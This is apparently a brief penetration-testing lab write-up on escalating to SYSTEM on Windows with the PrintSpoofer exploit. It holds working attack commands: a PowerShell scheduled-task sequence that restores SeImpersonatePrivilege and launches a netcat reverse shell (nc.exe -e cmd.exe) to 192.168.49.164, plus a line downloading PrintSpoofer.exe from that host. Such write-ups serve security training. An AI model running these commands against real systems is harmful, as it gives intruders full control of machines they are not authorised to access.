Printspoofer PE(instantly become System!)
- PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.To escalate privileges, the service account must have SeImpersonate privileges.
PrintSpoofer.exe -i -c cmd
Now we've got a rev shell with more privileges
Reading through the privileges we have now, it's confirmed that the
SeImpersonatePrivilege is missing but that can be retrieved by creating a ScheduledTaskPrincipal where we can specify SeImpersonatePrivilege in RequiredPrivilege attribute.# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"
# Create a Principal for the task
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
# Create an action for the task
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4445 -e cmd.exe`""
# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal
TaskPath TaskName State
-------- -------- -----
\ GrantAllPerms Ready
# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"
SeImpersonatePrivilege is on now! Let's get into the system with printspoofer!
powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164:8080/PrintSpoofer.exe","C:\wamp\www\prints.exe")
rooted!
Last modified 10mo ago